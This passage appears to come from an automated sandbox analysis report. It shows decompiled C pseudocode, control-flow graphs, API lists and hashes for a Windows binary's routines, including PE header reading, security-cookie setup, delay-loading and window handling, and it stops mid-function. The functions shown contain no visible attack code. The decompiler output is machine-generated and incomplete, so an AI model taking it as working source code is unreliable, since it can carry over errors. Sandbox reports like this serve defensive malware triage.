                                              control_flow_graph 199 7629b3-7629ee CreateFileW 200 7629f0-762a07 ReadFile 199->200 201 762a4f-762a5f call 761189 199->201 202 762a47-762a4e CloseHandle 200->202 203 762a09-762a12 200->203 202->201 203->202 205 762a14-762a23 SetFilePointer 203->205 205->202 207 762a25-762a3b ReadFile 205->207 207->202 208 762a3d-762a44 207->208 208->202
                                              C-Code - Quality: 81%
                                              			E007629B3(WCHAR* _a4) {
				signed int _v8;
				long _v12;
				void _v72;
				struct _OVERLAPPED* _v76;
				long _v80;
				signed short _v324;
				void _v328;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t17;
				int _t22;
				long _t25;
				int _t28;
				void* _t30;
				void* _t33;
				void* _t34;
				signed int _t37;

				_v8 =  *0x765040 ^ _t37;
				_v76 = 0;
				_t17 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t30 = _t17;
				if(_t30 == 0xffffffff) {
					L7:
					return E00761189(_v76, _t30, _v8 ^ _t37, _t33, _t34, 0);
				}
				_push(_t34);
				_t22 = ReadFile(_t30,  &_v72, 0x40,  &_v80, 0); // executed
				if(_t22 != 0 && 0x5a4d == _v72) {
					_t25 = SetFilePointer(_t30, _v12, 0, 0); // executed
					if(_t25 != 0xffffffff) {
						_t28 = ReadFile(_t30,  &_v328, 0xf8,  &_v80, 0); // executed
						if(_t28 != 0) {
							_v76 = _v324 & 0x0000ffff;
						}
					}
				}
				CloseHandle(_t30); // executed
				_pop(_t34);
				goto L7;
			}





















                                              0x007629c5
                                              0x007629e0
                                              0x007629e3
                                              0x007629e9
                                              0x007629ee
                                              0x00762a4f
                                              0x00762a5f
                                              0x00762a5f
                                              0x007629f0
                                              0x00762a03
                                              0x00762a07
                                              0x00762a1a
                                              0x00762a23
                                              0x00762a37
                                              0x00762a3b
                                              0x00762a44
                                              0x00762a44
                                              0x00762a3b
                                              0x00762a23
                                              0x00762a48
                                              0x00762a4e
                                              0x00000000

                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 007629E3
                                              • ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00762A03
                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00762A1A
                                              • ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00762A37
                                              • CloseHandle.KERNELBASE(00000000), ref: 00762A48
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: File$Read$CloseCreateHandlePointer
                                              • String ID:
                                              • API String ID: 3856724686-0
                                              • Opcode ID: 291c7e4154f9a9d84f66ad8be80d5b60158fb9b749a1e8fd102332d77c548cbd
                                              • Instruction ID: 7dd4653de67bcd7b11cd29b19fd169c83b27129a7352bf91ca499f9f1d9b9ee0
                                              • Opcode Fuzzy Hash: 291c7e4154f9a9d84f66ad8be80d5b60158fb9b749a1e8fd102332d77c548cbd
                                              • Instruction Fuzzy Hash: 2311B171500218BADB20DBA4CC88FEE7BACEF05710F144111FD06E6091D6B8DD46CB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 00761593 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00761593() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x765040;
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 != 0xbb40e64e) {
					if((0xffff0000 & _t14) == 0) {
						goto L1;
					}
					_t23 =  !_t14;
					 *0x765044 = _t23;
					return _t23;
				}
				L1:
				GetSystemTimeAsFileTime( &_v12);
				_t16 = GetCurrentProcessId();
				_t17 = GetCurrentThreadId();
				_t18 = GetTickCount();
				QueryPerformanceCounter( &_v20);
				_t22 = _v16 ^ _v20.LowPart;
				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
				if(_t32 == 0xbb40e64e || ( *0x765040 & 0xffff0000) == 0) {
					_t32 = 0xbb40e64f;
				}
				 *0x765040 = _t32;
				 *0x765044 =  !_t32;
				return _t22;
			}













                                              0x0076159b
                                              0x007615a0
                                              0x007615a4
                                              0x007615b6
                                              0x00762561
                                              0x00000000
                                              0x00000000
                                              0x00762567
                                              0x00762569
                                              0x00000000
                                              0x00762569
                                              0x007615bc
                                              0x007615c1
                                              0x007615cd
                                              0x007615d5
                                              0x007615dd
                                              0x007615e9
                                              0x007615f2
                                              0x007615f5
                                              0x007615f9
                                              0x00761616
                                              0x00761616
                                              0x00761603
                                              0x0076160b
                                              0x00000000

                                              APIs
                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007615C1
                                              • GetCurrentProcessId.KERNEL32 ref: 007615CD
                                              • GetCurrentThreadId.KERNEL32 ref: 007615D5
                                              • GetTickCount.KERNEL32 ref: 007615DD
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 007615E9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                              • String ID:
                                              • API String ID: 1445889803-0
                                              • Opcode ID: ca579246d6e2a6a21eada04aac59f39469449b335497ee252775ed346451f5cd
                                              • Instruction ID: b802ee3f369887b91fedc23935b0b5358999f531435d5ed431dc15cd892a9bb3
                                              • Opcode Fuzzy Hash: ca579246d6e2a6a21eada04aac59f39469449b335497ee252775ed346451f5cd
                                              • Instruction Fuzzy Hash: E4118E36C00314EBCB209BB8D94C6AAB7B8EB48351F9A4915E907E7210DBBC9D449B84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761189 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E00761189(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr* _t26;

				if(__ecx !=  *0x765040) {
					 *0x765180 = __eax;
					 *0x76517c = __ecx;
					 *0x765178 = __edx;
					 *0x765174 = __ebx;
					 *0x765170 = __esi;
					 *0x76516c = __edi;
					 *0x765198 = ss;
					 *0x76518c = cs;
					 *0x765168 = ds;
					 *0x765164 = es;
					 *0x765160 = fs;
					 *0x76515c = gs;
					asm("pushfd");
					_pop( *0x765190);
					 *0x765184 =  *_t26;
					 *0x765188 = _v0;
					 *0x765194 =  &_a4;
					 *0x7650d0 = 0x10001;
					 *0x76508c =  *0x765188;
					 *0x765080 = 0xc0000409;
					 *0x765084 = 1;
					_v812 =  *0x765040;
					_v808 =  *0x765044;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(E00763F68);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}








                                              0x0076118f
                                              0x00763e94
                                              0x00763e99
                                              0x00763e9f
                                              0x00763ea5
                                              0x00763eab
                                              0x00763eb1
                                              0x00763eb7
                                              0x00763ebd
                                              0x00763ec3
                                              0x00763ec9
                                              0x00763ecf
                                              0x00763ed5
                                              0x00763edb
                                              0x00763edc
                                              0x00763ee5
                                              0x00763eed
                                              0x00763ef5
                                              0x00763f00
                                              0x00763f0f
                                              0x00763f14
                                              0x00763f1e
                                              0x00763f2d
                                              0x00763f38
                                              0x00763f40
                                              0x00763f4b
                                              0x00763f64
                                              0x00761195
                                              0x00761195
                                              0x00761195

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00763F40
                                              • UnhandledExceptionFilter.KERNEL32(00763F68), ref: 00763F4B
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00763F56
                                              • TerminateProcess.KERNEL32(00000000), ref: 00763F5D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                              • String ID:
                                              • API String ID: 3231755760-0
                                              • Opcode ID: 94d8364c3ee3a955dcbf02222f0556f52c976359cc8e5bfbdaf9dc02d4a45614
                                              • Instruction ID: 7deb5d62041f59097a92f7b44b6b5aaeae9dc4575401e98dcc92c11038244384
                                              • Opcode Fuzzy Hash: 94d8364c3ee3a955dcbf02222f0556f52c976359cc8e5bfbdaf9dc02d4a45614
                                              • Instruction Fuzzy Hash: 5B216FB4805B08EFCB58DF29E9447483BB4FB0A304F948119E50A97260E7FC9985EF59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0076119B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 238 76119b-7611c7 239 7611cd-7611d1 238->239 240 7621f8-762206 GetWindowLongW 238->240 243 7622e7-7622ee 239->243 244 7611d7-7611e9 DefWindowProcW 239->244 241 7622cc 240->241 242 76220c-76221c GetWindow 240->242 241->243 245 762222-762252 memset GetClassNameW 242->245 246 7622cb 242->246 243->244 247 7622f4-7622f9 243->247 248 7611ef-7611fb call 761189 244->248 249 762254-762271 CompareStringW 245->249 250 76227a-762285 GetWindow 245->250 246->241 251 762305-762312 SetWindowLongW 247->251 252 7622fb-7622ff SetClassLongW 247->252 249->250 254 762273-762278 GetWindow 249->254 250->246 255 762287-762294 GetWindowLongW 250->255 251->248 252->251 254->250 255->246 257 762296-7622a3 GetClassLongW 255->257 257->246 258 7622a5-7622c5 GetClassLongW SetWindowLongW SetClassLongW 257->258 258->246
                                              C-Code - Quality: 86%
                                              			E0076119B(void* __ebx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				signed int _v8;
				void _v166;
				short _v168;
				struct HWND__* _v172;
				long _v176;
				void* __esi;
				long _t25;
				long _t27;
				long _t38;
				long _t44;
				void* _t53;
				struct HWND__* _t55;
				signed int _t57;

				_t54 = __edi;
				_t47 = __ebx;
				_v8 =  *0x765040 ^ _t57;
				_t25 = _a16;
				_t56 = _a4;
				_v172 = _t56;
				_v176 = _t25;
				if(_a8 == 0x1c) {
					_push(__ebx);
					if(GetWindowLongW(_t56, 0) == 0) {
						L14:
						_pop(_t47);
						L2:
						_t27 = DefWindowProcW(_v172, _a8, _a12, _v176);
						L3:
						return E00761189(_t27, _t47, _v8 ^ _t57, _t53, _t54, _t56);
					}
					_push(__edi);
					_t56 = GetWindow;
					_t55 = GetWindow(GetWindow, 3);
					if(_t55 == 0) {
						L13:
						_pop(_t54);
						goto L14;
					}
					_v168 = 0;
					memset( &_v166, 0, 0x9e);
					if(GetClassNameW(_t55,  &_v168, 0x50) != 0 && CompareStringW(0x7f, 1,  &_v168, 0xffffffff, ?str?, 0xffffffff) == 2) {
						_t55 = GetWindow(_t55, 3);
					}
					if(GetWindow(_t55, 4) == _v172) {
						_t56 = GetWindowLongW(_t55, 0xffffffec);
						if((_t56 & 0x00040080) == 0 && GetClassLongW(_t55, 0xffffffde) == 0) {
							_t38 = GetClassLongW(_v172, 0xfffffff2);
							SetWindowLongW(_t55, 0xffffffec, _t56);
							SetClassLongW(_t55, 0xffffffde, _t38);
						}
					}
					goto L13;
				}
				if(_a8 == 0x4e) {
					if( *((intOrPtr*)(_t25 + 8)) != 0xfffffe0c) {
						goto L2;
					}
					_t44 =  *(_t25 + 0xc);
					if(_t44 != 0) {
						SetClassLongW(_t56, 0xfffffff2, _t44);
					}
					SetWindowLongW(_t56, 0, 1);
					_t27 = 0;
					goto L3;
				}
				goto L2;
			}
















                                              0x0076119b
                                              0x0076119b
                                              0x007611ad
                                              0x007611b4
                                              0x007611b8
                                              0x007611bb
                                              0x007611c1
                                              0x007611c7
                                              0x007621f8
                                              0x00762206
                                              0x007622cc
                                              0x007622cc
                                              0x007611d7
                                              0x007611e9
                                              0x007611ef
                                              0x007611fb
                                              0x007611fb
                                              0x0076220c
                                              0x00762210
                                              0x00762218
                                              0x0076221c
                                              0x007622cb
                                              0x007622cb
                                              0x00000000
                                              0x007622cb
                                              0x0076222a
                                              0x00762238
                                              0x00762252
                                              0x00762278
                                              0x00762278
                                              0x00762285
                                              0x0076228c
                                              0x00762294
                                              0x007622ad
                                              0x007622bb
                                              0x007622c5
                                              0x007622c5
                                              0x00762294
                                              0x00000000
                                              0x00762285
                                              0x007611d1
                                              0x007622ee
                                              0x00000000
                                              0x00000000
                                              0x007622f4
                                              0x007622f9
                                              0x007622ff
                                              0x007622ff
                                              0x0076230a
                                              0x00762310
                                              0x00000000
                                              0x00762310
                                              0x00000000

                                              APIs
                                              • DefWindowProcW.USER32(?,0000004E,?,?), ref: 007611E9
                                              • GetWindowLongW.USER32(?,00000000), ref: 00762202
                                              • GetWindow.USER32(?,00000003), ref: 00762216
                                              • memset.MSVCRT ref: 00762238
                                              • GetClassNameW.USER32(00000000,?,00000050), ref: 0076224A
                                              • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00762268
                                              • GetWindow.USER32(00000000,00000003), ref: 00762276
                                              • GetWindow.USER32(00000000,00000004), ref: 0076227D
                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0076228A
                                              • GetClassLongW.USER32 ref: 0076229F
                                              • GetClassLongW.USER32 ref: 007622AD
                                              • SetWindowLongW.USER32 ref: 007622BB
                                              • SetClassLongW.USER32(00000000,000000DE,00000000), ref: 007622C5
                                              • SetClassLongW.USER32(?,000000F2,0000004E), ref: 007622FF
                                              • SetWindowLongW.USER32 ref: 0076230A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: LongWindow$Class$CompareNameProcStringmemset
                                              • String ID: IME$N
                                              • API String ID: 1578343765-3965882335
                                              • Opcode ID: cab724d612f71942bfb793bfd3af127b2f963c785d230645fcd7bc3931df9f03
                                              • Instruction ID: a9684859b4685dcd9a950c7b754e809b94391852b5a9bbbc2c549c756122ea33
                                              • Opcode Fuzzy Hash: cab724d612f71942bfb793bfd3af127b2f963c785d230645fcd7bc3931df9f03
                                              • Instruction Fuzzy Hash: 6B411830A00318BFCF605B658C48F6A76A8BF46720F558251FA17E61D1D7788D818F65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00763B77 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 111libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 259 763b77-763bbc 260 763bc1-763bc6 259->260 261 763bbe 259->261 262 763c40-763c44 260->262 263 763bc8-763bd7 LoadLibraryExA 260->263 261->260 264 763c46-763c4d 262->264 265 763c4f-763c53 262->265 266 763c1e-763c26 GetLastError 263->266 267 763bd9-763be6 InterlockedCompareExchange 263->267 270 763c82-763c8b DelayLoadFailureHook 264->270 265->270 271 763c55-763c64 GetProcAddress 265->271 268 763c2f-763c3b InterlockedCompareExchange 266->268 269 763c28-763c2d 266->269 272 763c13-763c1c FreeLibrary 267->272 273 763be8-763c07 267->273 268->264 275 763c3d 268->275 269->268 269->270 274 763c8d-763c91 270->274 276 763c66-763c6e GetLastError 271->276 277 763c77 271->277 272->262 273->262 278 763c09-763c11 273->278 279 763c93-763c96 274->279 280 763c98-763c9e 274->280 275->262 276->277 281 763c70-763c75 276->281 282 763c7e-763c80 277->282 278->262 279->280 281->277 281->282 282->270 282->274
                                              C-Code - Quality: 83%
                                              			E00763B77(struct HINSTANCE__* _a4, int* _a8) {
				signed int _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v24;
				CHAR* _v36;
				void _v44;
				char _v48;
				struct HINSTANCE__* _t34;
				int _t37;
				int _t41;
				CHAR* _t45;
				signed short _t47;
				signed int _t48;
				void* _t51;
				struct HINSTANCE__* _t56;
				LONG* _t60;
				int _t61;
				int _t62;

				_t34 = _a4;
				_v8 = _v8 & 0x00000000;
				_t60 =  *((intOrPtr*)(_t34 + 8)) + 0x760000;
				_t51 =  *_t60;
				_t45 =  *((intOrPtr*)(_t34 + 4)) + 0x760000;
				_t47 =  *( *((intOrPtr*)(_t34 + 0x10)) + 0x760000 + (_a8 -  *((intOrPtr*)(_t34 + 0xc)) - 0x760000 >> 2) * 4);
				_a4 = _t51;
				_t13 = _t47 + 0x760002; // 0xec0002
				_t37 = _t13;
				if(_t47 < 0) {
					_t37 = _t47 & 0x0000ffff;
				}
				_v12 = _t37;
				if(_t51 != 0) {
					L12:
					if(_a4 != 0xffffffff) {
						if(_a4 == 0) {
							L20:
							_push(_v12);
							_push(_t45);
							L00763CCE();
							_t61 = _t37;
							L21:
							if(_v8 != 0) {
								 *_a8 = _t61;
							}
							return _t61;
						}
						_t37 = GetProcAddress(_a4, _v12);
						_t61 = _t37;
						if(_t61 != 0) {
							L18:
							_v8 = 1;
							L19:
							if(_t61 != 0) {
								goto L21;
							}
							goto L20;
						}
						_t37 = GetLastError();
						if(_t37 == 0x7f || _t37 == 0xb6) {
							goto L18;
						} else {
							goto L19;
						}
					}
					L13:
					_v8 = 1;
					goto L20;
				}
				_t56 = LoadLibraryExA(_t45, _t51, _t51);
				_a4 = _t56;
				if(_t56 == 0) {
					_t37 = GetLastError();
					if(_t37 == 0x7e || _t37 == 0xc1) {
						_t37 = InterlockedCompareExchange(_t60, 0xffffffff, 0);
						if(_t37 == 0) {
							goto L13;
						}
						_a4 = _t37;
						goto L12;
					} else {
						goto L20;
					}
				}
				_t41 = InterlockedCompareExchange(_t60, _t56, 0);
				_t62 = _t41;
				if(_t62 != 0) {
					_t37 = FreeLibrary(_t56);
					_a4 = _t62;
				} else {
					_t48 = 8;
					memset( &_v44, _t41, _t48 << 2);
					_v24 = _a4;
					_t37 =  *0x763ca4; // 0x0
					_v48 = 0x24;
					_v36 = _t45;
					if(_t37 != 0) {
						_t37 =  *_t37(5,  &_v48);
					}
				}
				goto L12;
			}




















                                              0x00763b7f
                                              0x00763b82
                                              0x00763ba2
                                              0x00763ba4
                                              0x00763bad
                                              0x00763baf
                                              0x00763bb1
                                              0x00763bb4
                                              0x00763bb4
                                              0x00763bbc
                                              0x00763bbe
                                              0x00763bbe
                                              0x00763bc1
                                              0x00763bc6
                                              0x00763c40
                                              0x00763c44
                                              0x00763c53
                                              0x00763c82
                                              0x00763c82
                                              0x00763c85
                                              0x00763c86
                                              0x00763c8b
                                              0x00763c8d
                                              0x00763c91
                                              0x00763c96
                                              0x00763c96
                                              0x00763c9e
                                              0x00763c9e
                                              0x00763c5b
                                              0x00763c60
                                              0x00763c64
                                              0x00763c77
                                              0x00763c77
                                              0x00763c7e
                                              0x00763c80
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00763c80
                                              0x00763c66
                                              0x00763c6e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00763c6e
                                              0x00763c46
                                              0x00763c46
                                              0x00000000
                                              0x00763c46
                                              0x00763bd0
                                              0x00763bd2
                                              0x00763bd7
                                              0x00763c1e
                                              0x00763c26
                                              0x00763c34
                                              0x00763c3b
                                              0x00000000
                                              0x00000000
                                              0x00763c3d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00763c26
                                              0x00763bdd
                                              0x00763be2
                                              0x00763be6
                                              0x00763c14
                                              0x00763c19
                                              0x00763be8
                                              0x00763bea
                                              0x00763bee
                                              0x00763bf3
                                              0x00763bf6
                                              0x00763bfb
                                              0x00763c02
                                              0x00763c07
                                              0x00763c0f
                                              0x00763c0f
                                              0x00763c07
                                              0x00000000

                                              APIs
                                              • LoadLibraryExA.KERNEL32(00000000), ref: 00763BCB
                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00763BDD
                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00763C14
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00763C5B
                                              • GetLastError.KERNEL32(00000000,00000000), ref: 00763C66
                                              • DelayLoadFailureHook.KERNEL32(00000000,00000000), ref: 00763C86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$AddressCompareDelayErrorExchangeFailureFreeHookInterlockedLastProc
                                              • String ID: $
                                              • API String ID: 3506490669-3993045852
                                              • Opcode ID: 996a189f98300f3d8d1bb2c04e30bc7a98731b8dd27e1ef912372d7592c260eb
                                              • Instruction ID: 47aafc951dffbf4d299a63dc6890ecf1453be671c2a1393c06f4f93717e79969
                                              • Opcode Fuzzy Hash: 996a189f98300f3d8d1bb2c04e30bc7a98731b8dd27e1ef912372d7592c260eb
                                              • Instruction Fuzzy Hash: 0431AF71900215EFDB259F68C848BAEBBB5AF54750F258219FC06BB2C1C778DB44CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00761C02 Relevance: 15.1, APIs: 10, Instructions: 87libraryloaderstringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 87%
                                              			E00761C02(struct HINSTANCE__* _a4, short* _a8, intOrPtr* _a12) {
				_Unknown_base(*)()* _v8;
				WCHAR* _t21;
				_Unknown_base(*)()* _t30;
				_Unknown_base(*)()* _t32;
				void* _t39;
				short* _t41;
				int _t44;
				int _t49;
				_Unknown_base(*)()** _t51;

				 *_a12 = 0;
				_t21 = _a8;
				_v8 = 0;
				if(_t21 == 0) {
					L7:
					return _v8;
				}
				if( *_t21 == 0x23) {
					_t41 =  &(_t21[1]);
					if( *_t41 == 0) {
						goto L2;
					}
					__imp___wtoi(_t41);
					_v8 = GetProcAddress(_a4, _t21 & 0x0000ffff);
					goto L7;
				}
				L2:
				_t49 = lstrlenW(_t21) + 1;
				_t44 = _t49 + _t49;
				_t5 = _t44 + 2; // 0x2
				_t39 = LocalAlloc(0, _t5);
				if(_t39 == 0) {
					L6:
					goto L7;
				}
				if(WideCharToMultiByte(0, 0x400, _a8, _t49, _t39, _t44, 0, 0) != 0) {
					_t51 = _t39 + lstrlenA(_t39);
					 *_t51 = 0x57;
					 *((char*)(_t51 + 1)) = 0;
					_t30 = GetProcAddress(_a4, _t39);
					_v8 = _t30;
					if(_t30 == 0) {
						 *_a12 = 1;
						 *_t51 = 0x41;
						_t32 = GetProcAddress(_a4, _t39);
						_v8 = _t32;
						if(_t32 == 0) {
							 *_t51 = _t32;
							_v8 = GetProcAddress(_a4, _t39);
						}
					}
				}
				LocalFree(_t39);
				goto L6;
			}












                                              0x00761c0e
                                              0x00761c10
                                              0x00761c13
                                              0x00761c18
                                              0x00761c8f
                                              0x00761c94
                                              0x00761c94
                                              0x00761c1e
                                              0x0076238a
                                              0x00762390
                                              0x00000000
                                              0x00000000
                                              0x00762397
                                              0x007623ab
                                              0x00000000
                                              0x007623ab
                                              0x00761c24
                                              0x00761c2f
                                              0x00761c30
                                              0x00761c33
                                              0x00761c3e
                                              0x00761c44
                                              0x00761c8d
                                              0x00000000
                                              0x00761c8e
                                              0x00761c5c
                                              0x00761c6f
                                              0x00761c72
                                              0x00761c75
                                              0x00761c79
                                              0x00761c7b
                                              0x00761c80
                                              0x0076214e
                                              0x00762154
                                              0x00762157
                                              0x00762159
                                              0x0076215e
                                              0x00762168
                                              0x0076216c
                                              0x0076216c
                                              0x0076215e
                                              0x00761c80
                                              0x00761c87
                                              0x00000000

                                              APIs
                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00761C27
                                              • LocalAlloc.KERNEL32(00000000,00000002,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C38
                                              • WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?), ref: 00761C54
                                              • lstrlenA.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C5F
                                              • GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C79
                                              • LocalFree.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C87
                                              • GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00762157
                                              • GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 0076216A
                                              • _wtoi.MSVCRT ref: 00762397
                                              • GetProcAddress.KERNEL32(?,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 007623A5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: AddressProc$Locallstrlen$AllocByteCharFreeMultiWide_wtoi
                                              • String ID:
                                              • API String ID: 2554484480-0
                                              • Opcode ID: 1f7fd6d5941132f9725361213825cccbdf3e5442d59a6e3ac783c7197c770dac
                                              • Instruction ID: 825c2dbbeb5a23c99c06fbac38522753ee5972c2ba897110718210353a98384b
                                              • Opcode Fuzzy Hash: 1f7fd6d5941132f9725361213825cccbdf3e5442d59a6e3ac783c7197c770dac
                                              • Instruction Fuzzy Hash: FA217AB5500389EFCB219FA4CC889AABBECEB08354B588459F946D7210D6B8D940DA70
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00763168 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 394COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E00763168(void* __ecx, short* _a4, char _a8, wchar_t* _a12, signed int _a16) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _t121;
				intOrPtr _t124;
				signed int _t125;
				int _t128;
				intOrPtr* _t131;
				signed int _t136;
				short _t138;
				short _t140;
				intOrPtr* _t142;
				signed int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				intOrPtr _t163;
				signed int _t164;
				wchar_t* _t166;
				signed int _t170;
				intOrPtr _t171;
				signed int _t175;
				intOrPtr _t182;
				int _t185;
				short* _t190;
				wchar_t* _t192;
				signed int _t195;
				void* _t196;
				signed int _t197;
				intOrPtr _t198;
				intOrPtr _t199;
				signed int _t201;
				long _t203;
				void* _t208;
				void* _t209;
				long* _t211;
				wchar_t* _t214;
				char _t216;
				void* _t218;
				short* _t220;
				signed int _t221;

				_t190 = _a4;
				_t216 = _a8;
				_v20 = 0;
				_t121 = E00761AE1(_t190, _t216, E00761460);
				_v8 = _t121;
				if(_t121 < 0) {
					L113:
					return _t121;
				} else {
					if(_t216 > 0x8000) {
						return 0x80070057;
					}
					if(_t216 <= 0x104) {
						_a16 = _a16 & 0xfffffffe;
					}
					_t195 = _a16 & 0x00000001;
					_v16 = _t195;
					if(_t195 == 0 && _t216 > 0x104) {
